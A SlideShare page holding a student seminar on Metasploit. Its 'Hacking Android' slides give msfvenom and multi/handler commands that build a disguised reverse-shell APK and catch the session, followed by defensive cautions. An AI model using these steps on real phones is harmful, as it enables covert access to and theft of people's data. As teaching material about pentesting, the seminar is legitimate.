SlideShare a Scribd company logo

Metasploit seminar

Download as PPTX, PDF
H
henelpj

This document provides an introduction to Metasploit, a penetration testing platform used to find, exploit, and validate vulnerabilities. It discusses how to create an Android payload file using msfvenom, send it to a target device, and use Metasploit to interact with the device after payload execution. The document also lists some advantages and disadvantages of Metasploit and references used.

Self Improvement
1 of 20
Downloaded 15 times
1
2
3
4
5
6
7
8
9
10
11
12
Most read
13
Most read
14
15
16
Most read
17
18
19
20
METASPLOIT GUIDE IN CHARGE Mr.JINSONDEVIS PRESENTED BY HENEL PJ MCA LE S3 ROLLNO 23
CONTENTS  Introduction Kali Linux Penetration testing  Metasploit Introduction to Metasploit Advantages & Disadvantages  Steps to Hacking Android with Metasploit Payload File Creation Sending payload To the Target Running Metasploit and AttackerSetup Commands to exploits victim’sAndroid  Future Scope  Conclusion  References
INTRODUCTION ON KALI LINUX Debian-based Linuxdistribution aimed at advanced PenetrationTestingand SecurityAuditing. ReleaseDate: March 13th, 2013. Kali containsseveraltools Information security tasks PenetrationTesting,Securityresearch Computer Forensicsand ReverseEngineering
Also called pentesting Testing a computer system/network /Web application to find vulnerabilities. Benefits: Intelligently manage vulnerabilities Avoid the cost of network downtime Penetration Testing
MAIN TERMS EXPLOIT- a piece of code written to take advantage of a particular vulnerability inthe system. PAYLOAD- simplescriptsthat the hackersutilize to interact with a hacked system. LHOST- TheIPaddress youwant your listener to bind to. LPORT- Theport youwantyour listener to bind to. Meterpreter - advanced, dynamically extensible payload that uses in memorydll injection & extended over the n/w at runtime.
METASPLOIT penetration testing platform that enables to find, exploit, andvalidate vulnerabilities. Author:Rapid7
METASPLOITINTERFACES Metasploit can be used either with Console, command prompt or with GUI. Msfconsole –part of metasploitframework, provide interface with all options.
Advantages  Open source  Frequently updated Disadvantages  Difficult to learn  Can crash your system if not used wisely  Requires deep knowledge for exploit development
HACKINGANDROIDWITH METASPLOIT STEP1:OPEN THE METASPLOIT CONSOLE IN KALI Path:Applications → Exploitation Tools → Metasploit
Some other tools  Ezsploit : Linux bash script automation for metasploit use to create payload for multiple platform (Taken by Nidha)  Armitage : GUI for metasploit framework. (Taken by Jubin)  TheFatRat : It is used to create a backdoor and the backdoor is executed android device and access control the device. (Taken by Ajil)
Fig: Metasploit console
STEP 2: TYPE THE FOLLOWING COMMAND IN THE TERMINAL FOR CREATING THE PAYLOAD FILE msf > msfvenom –p android/meterpreter/reverse_tcp LHOST=192.168.43.207 LPORT=6060 > clear.apk
STEP 3: Install apk
STEP 4: USE THE “exploit/multi/handler” Payload Handler is a module that provides all the features of the metasploit payload system to exploit. msf > use exploit/multi/handler STEP 5: SET THE PAYLOAD msf exploit(multi/handler) > set payload android/meterpreter/reverse_tcp STEP 6: SET THE LOCAL HOST msf exploit(multi/handler) > set LHOST 192.168.43.207 STEP 7: SET THE LOCAL PORT msf exploit(multi/handler) > set LPORT 6060
Metasploit seminar
STEP 8: RUN THE COMMAND “ exploit ” msf exploit(multi/handler) > exploit
CONCLUSION The backdoor application when installed and turned on the mobile allows attacker to read, write and modify data. Cautions are. Never permanently enable installing of Apps from “Unknown sources “. Never take your phone to important meetings or anywhere you don't want people listening. Keep your Android up to date. Installing antivirus software on your Android device.
REFERENCE www.metasploit.com www.rapid7.com https://tools.kali.org/exploitation-tools/metasploit- framework www.securitytube.net www.google.com www.youtube.com
THANK YOU…………
Metasploit seminar

More Related Content

PPTX
Metasploit framework in Network Security
Ashok Reddy Medikonda
 
PPTX
Metasploit
Lalith Sai
 
PPTX
Metasploit framwork
Deepanshu Gajbhiye
 
PDF
Metaploit
Ajinkya Pathak
 
PPTX
Thick client pentesting_the-hackers_meetup_version1.0pptx
Anurag Srivastava
 
PDF
Pentest with Metasploit
M.Syarifudin, ST, OSCP, OSWP
 
PPTX
Metasploit
Institute of Information Security (IIS)
 
PPTX
Metasploit
henelpj
 
Metasploit framework in Network Security
Ashok Reddy Medikonda
 
Metasploit
Lalith Sai
 
Metasploit framwork
Deepanshu Gajbhiye
 
Metaploit
Ajinkya Pathak
 
Thick client pentesting_the-hackers_meetup_version1.0pptx
Anurag Srivastava
 
Pentest with Metasploit
M.Syarifudin, ST, OSCP, OSWP
 
Metasploit
Institute of Information Security (IIS)
 
Metasploit
henelpj
 

What's hot (20)

PPTX
WTF is Penetration Testing v.2
Scott Sutherland
 
PDF
Nessus Software
Megha Sahu
 
PPTX
Finalppt metasploit
devilback
 
PPTX
Introduction to Metasploit
GTU
 
PPTX
Introduction To Exploitation & Metasploit
Raghav Bisht
 
PPTX
OpenVAS: Vulnerability Assessment Scanner
Chandrak Trivedi
 
PPTX
Metasploit (Module-1) - Getting Started With Metasploit
Anurag Srivastava
 
PPTX
Nessus-Vulnerability Tester
Aditya Jain
 
PPT
Penetration Testing Basics
Rick Wanner
 
PPTX
Demo of security tool nessus - Network vulnerablity scanner
Ajit Dadresa
 
PDF
Ch 11: Hacking Wireless Networks
Sam Bowne
 
PDF
Vulnerability Management
asherad
 
PPTX
OWASP Top 10 2021 What's New
Michael Furman
 
PPTX
Introduction to penetration testing
Nezar Alazzabi
 
PDF
Metasploit for Penetration Testing: Beginner Class
Georgia Weidman
 
PPTX
Application Security Architecture and Threat Modelling
Priyanka Aash
 
PDF
MITRE ATT&CK Framework
n|u - The Open Security Community
 
PPTX
7 Steps to Threat Modeling
Danny Wong
 
PDF
Metasploitable
Sri Manakula Vinayagar Engineering College
 
PPTX
Understanding NMAP
Phannarith Ou, G-CISO
 
WTF is Penetration Testing v.2
Scott Sutherland
 
Nessus Software
Megha Sahu
 
Finalppt metasploit
devilback
 
Introduction to Metasploit
GTU
 
Introduction To Exploitation & Metasploit
Raghav Bisht
 
OpenVAS: Vulnerability Assessment Scanner
Chandrak Trivedi
 
Metasploit (Module-1) - Getting Started With Metasploit
Anurag Srivastava
 
Nessus-Vulnerability Tester
Aditya Jain
 
Penetration Testing Basics
Rick Wanner
 
Demo of security tool nessus - Network vulnerablity scanner
Ajit Dadresa
 
Ch 11: Hacking Wireless Networks
Sam Bowne
 
Vulnerability Management
asherad
 
OWASP Top 10 2021 What's New
Michael Furman
 
Introduction to penetration testing
Nezar Alazzabi
 
Metasploit for Penetration Testing: Beginner Class
Georgia Weidman
 
Application Security Architecture and Threat Modelling
Priyanka Aash
 
MITRE ATT&CK Framework
n|u - The Open Security Community
 
7 Steps to Threat Modeling
Danny Wong
 
Metasploitable
Sri Manakula Vinayagar Engineering College
 
Understanding NMAP
Phannarith Ou, G-CISO
 
Ad

Similar to Metasploit seminar (20)

PPTX
Lifnaaaaaa e
henelpj
 
PPTX
Intro to exploits in metasploitand payloads in msfvenom
Siddharth Krishna Kumar
 
PDF
24 33 -_metasploit
wozgeass
 
DOCX
Lab-10 Malware Creation and Denial of Service (DoS) In t.docx
pauline234567
 
DOCX
Backtrack Manual Part7
Nutan Kumar Panda
 
PDF
Exploits Attack on Windows Vulnerabilities
Amit Kumbhar
 
PDF
ENPM808 Independent Study Final Report - amaster 2019
Alexander Master
 
DOCX
Backtrack Manual Part6
Nutan Kumar Panda
 
PPT
[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar
Prajwal Panchmahalkar
 
PPT
Metapwn
n|u - The Open Security Community
 
PPTX
Metasploit - Basic and Android Demo
Arpit Agarwal
 
PPTX
Pentesting with linux
Hammad Ahmed Khawaja
 
PPTX
Kali Linux - Falconer
Tony Godfrey
 
PDF
Penetrating Windows 8 with syringe utility
IOSR Journals
 
PDF
Compromising windows 8 with metasploit’s exploit
IOSR Journals
 
PDF
Unveiling-Patchwork
Brandon Levene
 
PPTX
Metasploit for Web Workshop
Dennis Maldonado
 
PPTX
The FatRat
AjilSunny
 
PPT
Automated Penetration Testing With The Metasploit Framework
Tom Eston
 
PDF
Metasploit Humla for Beginner
n|u - The Open Security Community
 
Lifnaaaaaa e
henelpj
 
Intro to exploits in metasploitand payloads in msfvenom
Siddharth Krishna Kumar
 
24 33 -_metasploit
wozgeass
 
Lab-10 Malware Creation and Denial of Service (DoS) In t.docx
pauline234567
 
Backtrack Manual Part7
Nutan Kumar Panda
 
Exploits Attack on Windows Vulnerabilities
Amit Kumbhar
 
ENPM808 Independent Study Final Report - amaster 2019
Alexander Master
 
Backtrack Manual Part6
Nutan Kumar Panda
 
[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar
Prajwal Panchmahalkar
 
Metapwn
n|u - The Open Security Community
 
Metasploit - Basic and Android Demo
Arpit Agarwal
 
Pentesting with linux
Hammad Ahmed Khawaja
 
Kali Linux - Falconer
Tony Godfrey
 
Penetrating Windows 8 with syringe utility
IOSR Journals
 
Compromising windows 8 with metasploit’s exploit
IOSR Journals
 
Unveiling-Patchwork
Brandon Levene
 
Metasploit for Web Workshop
Dennis Maldonado
 
The FatRat
AjilSunny
 
Automated Penetration Testing With The Metasploit Framework
Tom Eston
 
Metasploit Humla for Beginner
n|u - The Open Security Community
 
Ad

Recently uploaded (20)

PDF
Anxiety Awareness Journal One Week Preview
ShivainSacheti1
 
DOCX
Boost your energy levels and Shred Weight
antonevensson0
 
PPTX
A portfolio Template for Interior Designer
linomax1993
 
PPTX
Unlocking Success Through the Relentless Power of Grit
yasmeenayr
 
DOCX
Paulo Tuynmam: Nine Timeless Anchors of Authentic Leadership
paulotuynmam
 
PPTX
Commmunication in Todays world- Principles and Barriers
MandyBuchanan2
 
PDF
Top 10 Visionary Entrepreneurs to Watch in 2025
timeiconic007
 
PDF
Want to Fly Like an Eagle - Leave the Chickens Behind.pdf
Million-$-Knowledge {Million Dollar Knowledge}
 
PDF
PLAYLISTS DEI MEGAMIX E DEEJAY PARADE DAL 1991 AL 2004 SU RADIO DEEJAY
Dj Fonzie Ciaco (Alfonso Ciavoli Cortelli)
 
PPT
Lesson From Geese! Understanding Teamwork
verczar37
 
PPTX
Emotional Intelligence- Importance and Applicability
MandyBuchanan2
 
PPTX
UNIVERSAL HUMAN VALUES for NEP student .pptx
Amuanpuia1
 
PPTX
THEORIES-PSYCH-3.pptx theory of Abraham Maslow
stodomingoconstructi
 
PDF
Lesson 4 Education for Better Work. Evaluate your training options.
Maria Stella Solon
 
PPTX
Hazards-of-Uncleanliness-Protecting-Your-Health.pptx
shinjanmandal111
 
PDF
Why is mindset more important than motivation.pdf
Million-$-Knowledge {Million Dollar Knowledge}
 
PDF
SEX-GENDER-AND-SEXUALITY-LESSON-1-M (2).pdf
jemmgomez09
 
PDF
technical writing on emotional quotient ppt
arnavedu258
 
PDF
Quiet Wins: Why the Silent Fish Survives.pdf
Million-$-Knowledge {Million Dollar Knowledge}
 
PDF
⚡ Prepping for grid failure_ 6 Must-Haves to Survive Blackout!.pdf
BuySmart Advisor
 
Anxiety Awareness Journal One Week Preview
ShivainSacheti1
 
Boost your energy levels and Shred Weight
antonevensson0
 
A portfolio Template for Interior Designer
linomax1993
 
Unlocking Success Through the Relentless Power of Grit
yasmeenayr
 
Paulo Tuynmam: Nine Timeless Anchors of Authentic Leadership
paulotuynmam
 
Commmunication in Todays world- Principles and Barriers
MandyBuchanan2
 
Top 10 Visionary Entrepreneurs to Watch in 2025
timeiconic007
 
Want to Fly Like an Eagle - Leave the Chickens Behind.pdf
Million-$-Knowledge {Million Dollar Knowledge}
 
PLAYLISTS DEI MEGAMIX E DEEJAY PARADE DAL 1991 AL 2004 SU RADIO DEEJAY
Dj Fonzie Ciaco (Alfonso Ciavoli Cortelli)
 
Lesson From Geese! Understanding Teamwork
verczar37
 
Emotional Intelligence- Importance and Applicability
MandyBuchanan2
 
UNIVERSAL HUMAN VALUES for NEP student .pptx
Amuanpuia1
 
THEORIES-PSYCH-3.pptx theory of Abraham Maslow
stodomingoconstructi
 
Lesson 4 Education for Better Work. Evaluate your training options.
Maria Stella Solon
 
Hazards-of-Uncleanliness-Protecting-Your-Health.pptx
shinjanmandal111
 
Why is mindset more important than motivation.pdf
Million-$-Knowledge {Million Dollar Knowledge}
 
SEX-GENDER-AND-SEXUALITY-LESSON-1-M (2).pdf
jemmgomez09
 
technical writing on emotional quotient ppt
arnavedu258
 
Quiet Wins: Why the Silent Fish Survives.pdf
Million-$-Knowledge {Million Dollar Knowledge}
 
⚡ Prepping for grid failure_ 6 Must-Haves to Survive Blackout!.pdf
BuySmart Advisor
 

Metasploit seminar

  • 1. METASPLOIT GUIDE IN CHARGE Mr.JINSONDEVIS PRESENTED BY HENEL PJ MCA LE S3 ROLLNO 23
  • 2. CONTENTS  Introduction Kali Linux Penetration testing  Metasploit Introduction to Metasploit Advantages & Disadvantages  Steps to Hacking Android with Metasploit Payload File Creation Sending payload To the Target Running Metasploit and AttackerSetup Commands to exploits victim’sAndroid  Future Scope  Conclusion  References
  • 3. INTRODUCTION ON KALI LINUX Debian-based Linuxdistribution aimed at advanced PenetrationTestingand SecurityAuditing. ReleaseDate: March 13th, 2013. Kali containsseveraltools Information security tasks PenetrationTesting,Securityresearch Computer Forensicsand ReverseEngineering
  • 4. Also called pentesting Testing a computer system/network /Web application to find vulnerabilities. Benefits: Intelligently manage vulnerabilities Avoid the cost of network downtime Penetration Testing
  • 5. MAIN TERMS EXPLOIT- a piece of code written to take advantage of a particular vulnerability inthe system. PAYLOAD- simplescriptsthat the hackersutilize to interact with a hacked system. LHOST- TheIPaddress youwant your listener to bind to. LPORT- Theport youwantyour listener to bind to. Meterpreter - advanced, dynamically extensible payload that uses in memorydll injection & extended over the n/w at runtime.
  • 6. METASPLOIT penetration testing platform that enables to find, exploit, andvalidate vulnerabilities. Author:Rapid7
  • 7. METASPLOITINTERFACES Metasploit can be used either with Console, command prompt or with GUI. Msfconsole –part of metasploitframework, provide interface with all options.
  • 8. Advantages  Open source  Frequently updated Disadvantages  Difficult to learn  Can crash your system if not used wisely  Requires deep knowledge for exploit development
  • 9. HACKINGANDROIDWITH METASPLOIT STEP1:OPEN THE METASPLOIT CONSOLE IN KALI Path:Applications → Exploitation Tools → Metasploit
  • 10. Some other tools  Ezsploit : Linux bash script automation for metasploit use to create payload for multiple platform (Taken by Nidha)  Armitage : GUI for metasploit framework. (Taken by Jubin)  TheFatRat : It is used to create a backdoor and the backdoor is executed android device and access control the device. (Taken by Ajil)
  • 12. STEP 2: TYPE THE FOLLOWING COMMAND IN THE TERMINAL FOR CREATING THE PAYLOAD FILE msf > msfvenom –p android/meterpreter/reverse_tcp LHOST=192.168.43.207 LPORT=6060 > clear.apk
  • 14. STEP 4: USE THE “exploit/multi/handler” Payload Handler is a module that provides all the features of the metasploit payload system to exploit. msf > use exploit/multi/handler STEP 5: SET THE PAYLOAD msf exploit(multi/handler) > set payload android/meterpreter/reverse_tcp STEP 6: SET THE LOCAL HOST msf exploit(multi/handler) > set LHOST 192.168.43.207 STEP 7: SET THE LOCAL PORT msf exploit(multi/handler) > set LPORT 6060
  • 16. STEP 8: RUN THE COMMAND “ exploit ” msf exploit(multi/handler) > exploit
  • 17. CONCLUSION The backdoor application when installed and turned on the mobile allows attacker to read, write and modify data. Cautions are. Never permanently enable installing of Apps from “Unknown sources “. Never take your phone to important meetings or anywhere you don't want people listening. Keep your Android up to date. Installing antivirus software on your Android device.